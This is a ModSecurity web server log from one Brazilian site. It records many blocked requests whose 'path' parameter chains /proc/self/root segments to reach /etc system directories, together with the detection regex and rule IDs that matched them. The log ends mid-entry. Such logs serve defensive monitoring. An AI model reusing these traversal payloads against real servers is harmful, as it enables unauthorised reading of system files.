https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:29:12.222061 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.243.128:33148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-eCmAPhZkrhU8w4lJLgAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:29:19.773403 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.243.128:56226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-f9Y0UrI5A3LftIx4XQAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:29:22.964264 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.241.31:54668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-gvu8EFLIOrSqIpvhGAAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:29:32.546235 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.243.128:51160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-iymAPhZkrhU8w4lJPQAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:29:35.682913 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:44180] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-j-oXxyEfFpUF8f9JrwAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:29:50.848451 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:44190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-nuyqAr6etmhZHNqYMAAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:30:24.367603 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:52392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-v0zinOy1jxa1j4fubAAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:30:43.404568 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:50928] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-09Y0UrI5A3LftIx4ygAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:30:50.766635 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:33462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-2sdf6f5d65gmYZSvowAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:31:11.099027 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:56938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-7vu8EFLIOrSqIpvhngAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:31:15.295182 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:43982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp-88df6f5d65gmYZSvsgAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:31:22.763693 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:44010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp--ta6ubjKNq_cu4ZzkgAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:31:37.354486 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:45078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_Cda6ubjKNq_cu4ZzrQAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:32:43.059001 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:37506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_S-oXxyEfFpUF8f9KpQAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:32:45.729241 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.228.61:43600] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp_TPu8EFLIOrSqIpviFgAAAks"]
[Wed Mar 18 07:32:51.718570 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.241.31:32980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_UymAPhZkrhU8w4lKFwAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:32:52.142751 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.244.43:53104] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abp_VOw_le52K8_3pV28XQAAAgs"]
[Wed Mar 18 07:32:52.303208 2026] [:error] [pid 11816:tid 140411574073088] [client 216.73.216.191:40666] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_VOw_le52K8_3pV28XgAAAhQ"]
[Wed Mar 18 07:32:53.199087 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.241.31:59586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_Vcdf6f5d65gmYZSwAQAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:32:54.556652 2026] [:error] [pid 11816:tid 140411607643904] [client 216.73.216.191:40758] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_Vuw_le52K8_3pV28ZgAAAhA"]
[Wed Mar 18 07:32:57.375495 2026] [:error] [pid 15826:tid 140411641214720] [client 216.73.216.191:41012] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_WeoXxyEfFpUF8f9KrAAAAUw"]
[Wed Mar 18 07:32:58.875503 2026] [:error] [pid 19507:tid 140411699963648] [client 216.73.216.191:41110] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_WtY0UrI5A3LftIx5kAAAAYU"]
[Wed Mar 18 07:33:10.886653 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:59602] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_ZuyqAr6etmhZHNqZGwAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:33:33.295907 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:47914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp_ffu8EFLIOrSqIpviRAAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 07:34:36.910289 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.241.31:42518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 